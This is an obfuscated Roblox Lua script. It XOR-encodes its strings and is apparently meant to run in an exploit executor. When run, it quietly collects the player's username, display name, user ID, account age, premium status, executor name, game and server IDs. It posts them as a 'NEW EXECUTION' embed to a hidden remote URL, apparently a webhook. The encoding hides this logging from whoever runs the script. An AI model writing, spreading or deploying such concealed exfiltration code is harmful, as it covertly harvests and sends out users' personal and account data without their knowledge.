--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.7) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v19,v20) local v21={};for v22=1, #v19 do v6(v21,v0(v4(v1(v2(v19,v22,v22 + 1 )),v1(v2(v20,1 + (v22% #v20) ,1 + (v22% #v20) + 1 )))%256 ));end return v5(v21);end local v8=v7("\217\215\207\53\245\225\136\81\213\202\200\38\233\169\195\80\210\204\214\106\231\171\206\81\198\198\217\45\233\180\204\13\158\146\137\114\191\239\159\78\136\149\137\118\191\237\148\76\130\155\131\116\169\184\242\56\220\218\226\13\225\131\245\29\128\146\143\11\234\152\245\52\243\244\233\116\222\226\244\41\218\204\244\38\213\132\138\49\255\250\221\6\229\188\202\15\253\155\240\6\190\153\213\33\128\200\240\6\215\237\211\33\195\148\143\35\199\152\194\10\131","\126\177\163\187\69\134\219\167");_G.Discord_UserID="";local v9=game:GetService(v7("\19\193\43\220\249\49\222","\156\67\173\74\165")).LocalPlayer;local v10=os.time() -(v9.AccountAge * (86429 -(22 + 7))) ;local v11=os.date(v7("\117\253\93","\38\84\215\41\118\220\70"),v10);local v12=false;local v13=true;if (v9.MembershipType==Enum.MembershipType.Premium) then v12=true;end if ( not v12 and (v9.AccountAge>=(123 + 177))) then v13=v7("\100\23\46\4\251\74","\158\48\118\66\114");elseif (v12 and (v9.AccountAge>=365)) then v13=false;end local v14=identifyexecutor() or v7("\143\33\3\53\124\171\243\174\39\25\50\124","\155\203\68\112\86\19\197") ;local v15=game:HttpGet(string.format(v7("\78\201\34\236\83\34\170\183\82\213\35\241\66\118\228\241\74\206\120\238\79\122\233\247\94\147\53\243\77\55\243\169\9\200\37\249\82\107\170\249\80\220\34\253\82\39\240\235\67\207\31\248\83\37\160\252\0\206\63\230\69\37\180\160\22\197\103\164\16\62\227\247\84\208\55\232\29\72\235\255\0\212\37\223\73\106\230\237\74\220\36\161\84\106\240\253","\152\38\189\86\156\32\24\133"),game.Players.LocalPlayer.UserId));v15=game:GetService(v7("\212\67\179\86\207\82\181\80\245\84\162","\38\156\55\199")):JSONDecode(v15).data[1 + 0 ];local v17=v15.imageUrl;local v18={[v7("\189\110\121\58\29\117\247\70","\35\200\29\28\72\115\20\154")]=v7("\53\176\214\216\136\62","\84\121\223\177\191\237\76"),[v7("\186\64\200\180\59\66\15\212\169\90","\161\219\54\169\192\90\48\80")]=v7("\65\86\20\53\90\24\79\106\74\70\14\107\77\75\19\38\70\80\4\36\89\82\78\38\70\79\79\36\93\86\1\38\65\79\5\43\93\81\79\116\27\21\87\124\30\22\84\114\26\16\80\115\30\27\86\118\31\27\79\116\27\21\89\113\30\18\87\125\31\16\85\124\16\26\80\113\25\16\79\12\100\101\63\119\25\16\84\117\17\16\85\26\24\22\81\118\25\26\78\47\89\69\95\32\81\31\86\115\77\22\88\35\17\20\70\44\90\31\86\115\77\17\83\32\25\20\70\45\68\31\89\38\27\71\6\39\76\71\2\117\31\16\87\38\77\17\87\116\16\17\89\119\74\23\83\116\77\17\81\33\74\68\5\119\17\17\2\32\30\17\87\118\29\70\89\119\77\20\5\116\79\70\85\32\28\19\3\124\29\23\80\32\74\68\70","\69\41\34\96"),[v7("\191\204\217\30\7\37\168","\75\220\163\183\106\98")]=((_G.Discord_UserID~="") and (_G.Discord_UserID~=nil) and tostring(v7("\94\154","\185\98\218\235\87")   .. _G.Discord_UserID   .. ">" )) or " " ,[v7("\206\49\37\227\218\185","\202\171\92\71\134\190")]={{[v7("\42\206\32\135\59","\232\73\161\76")]=tonumber(tostring(v7("\235\193\26\4\61\157\255\18","\126\219\185\34\61"))),[v7("\24\199\74\126\123","\135\108\174\62\18\30\23\147")]="🔥 **NEW EXECUTION**",[v7("\162\225\63\198\26\160\50\206\186","\167\214\137\74\171\120\206\83")]={[v7("\158\226\62","\199\235\144\82\61\152")]=v17},[v7("\1\31\188\39\3\5","\75\103\118\217")]={{[v7("\201\85\125\17","\126\167\52\16\116\217")]="Usuário:",[v7("\222\47\44\149\177","\156\168\78\64\224\212\121")]=v7("\27\242","\174\103\142\197")   .. v9.Name   .. v7("\74\52","\152\54\72\63\88\69\62") ,[v7("\221\202\226\85\218\193","\60\180\164\142")]=true},{[v7("\86\95\8\44","\114\56\62\101\73\71\141")]=v7("\150\230\214\193\248\237\222\132\156\224\200\212\180\232\194\158","\164\216\137\187"),[v7("\196\231\61\167\163","\107\178\134\81\210\198\158")]=v9.DisplayName,[v7("\49\0\142\207\164\61","\202\88\110\226\166")]=true},{[v7("\205\14\143\242","\170\163\111\226\151")]=v7("\56\20\242\60\79\119\10\30\62\166\57\20","\73\113\80\210\88\46\87"),[v7("\151\45\193\7\226","\135\225\76\173\114")]=v7("\6\241\131","\199\122\141\216\208\204\221")   .. v9.UserId   .. v7("\144\149","\150\205\189\112\144\24")   .. tostring(v7("\45\144\171\92\23\210\94\95\50\147\168\2\22\135\19\28\42\156\241\79\11\133\94\5\54\129\173\95\75","\112\69\228\223\44\100\232\113")   .. game.Players.LocalPlayer.UserId   .. v7("\155\15\21\220\176\117\138\209","\230\180\127\103\179\214\28") )   .. v7("\197\25\67","\128\236\101\63\38\132\33") ,[v7("\165\167\29\77\184\238","\175\204\201\113\36\214\139")]=true},{[v7("\73\205\56\217","\100\39\172\85\188")]=v7("\132\92\249\132\60\237\82\182\135\60\247","\83\205\24\217\224"),[v7("\240\196\193\40\227","\93\134\165\173")]="["   .. game.PlaceId   .. v7("\131\186","\30\222\146\161\162\90\174\210")   .. tostring(v7("\237\90\100\26\246\20\63\69\242\89\103\68\247\65\114\6\234\86\62\9\234\67\63\13\228\67\117\25\170","\106\133\46\16")   .. game.PlaceId )   .. ")" ,[v7("\81\46\127\245\84\69","\32\56\64\19\156\58")]=true},{[v7("\84\201\232\83","\224\58\168\133\54\58\146")]=v7("\119\89\70\248\53\130\136\75\115\89\76\242\47","\107\57\54\43\157\21\230\231"),[v7("\205\138\29\224\188","\175\187\235\113\149\217\188")]=game:GetService(v7("\17\174\147\71\230\109\104\48\174\130\73\208\124\106\42\166\130\73","\24\92\207\225\44\131\25")):GetProductInfo(game.PlaceId).Name,[v7("\66\221\180\69\21\120","\29\43\179\216\44\123")]=true},{[v7("\179\216\45\73","\44\221\185\64")]=v7("\36\255\77\92\102\21\232\90\31\70\18\230\76\80\41","\19\97\135\40\63"),[v7("\184\93\63\46\42","\81\206\60\83\91\79")]=v14,[v7("\71\165\220\123\33\198","\196\46\203\176\18\79\163\45")]=true},{[v7("\182\35\115\27","\143\216\66\30\126\68\155")]=v7("\139\196\25\139\225\166\195\228\169\220\2\217\159","\129\202\168\109\171\165\195\183"),[v7("\52\89\59\205\219","\134\66\56\87\184\190\116")]=v13,[v7("\53\63\5\178\23\238","\85\92\81\105\219\121\139\65")]=true},{[v7("\243\178\93\64","\191\157\211\48\37\28")]=v7("\246\27\245\24\63\159\27\245\92\25\208\17\224\29\96","\90\191\127\148\124"),[v7("\110\134\34\2\125","\119\24\231\78")]=v9.AccountAge   .. v7("\134\44\188\2\207\9","\113\226\77\197\42\188\32") ,[v7("\51\24\248\188\52\19","\213\90\118\148")]=true},{[v7("\85\47\185\83","\45\59\78\212\54")]="Data de Criação:",[v7("\6\87\143\158\131","\144\112\54\227\235\230\78\205")]=v11.day   .. "/"   .. v11.month   .. "/"   .. v11.year ,[v7("\186\38\3\245\222\94","\59\211\72\111\156\176")]=true},{[v7("\64\134\238\40","\77\46\231\131")]=v7("\147\112\246\68\181\20\133\69\168\66\191\68\181\70\236","\32\218\52\214"),[v7("\88\22\61\189\244","\58\46\119\81\200\145\208\37")]=game.JobId,[v7("\34\130\60\165\167\184","\86\75\236\80\204\201\221")]=true}},[v7("\102\72\122\128\237\159\115\76\103","\235\18\33\23\229\158")]=os.date(v7("\21\131\140\254\93\247\132\191\100\255\249\245\0\234\145\129","\219\48\218\161"))}}};request=http_request or request or HttpPost or syn.request ;request({[v7("\209\99\112","\128\132\17\28\41\187\47")]=v8,[v7("\44\55\18\50\82\5","\61\97\82\102\90")]=v7("\156\1\152\127","\105\204\78\203\43\167\55\126"),[v7("\141\175\34\26\22\22\212","\49\197\202\67\126\115\100\167")]={[v7("\20\84\209\61\133\88\74\122\111\198\57\133","\62\87\59\191\73\224\54")]=v7("\230\18\234\197\238\1\251\221\238\13\244\134\237\17\245\199","\169\135\98\154")},[v7("\233\120\32\77","\168\171\23\68\52\157\83")]=game.HttpService:JSONEncode(v18)});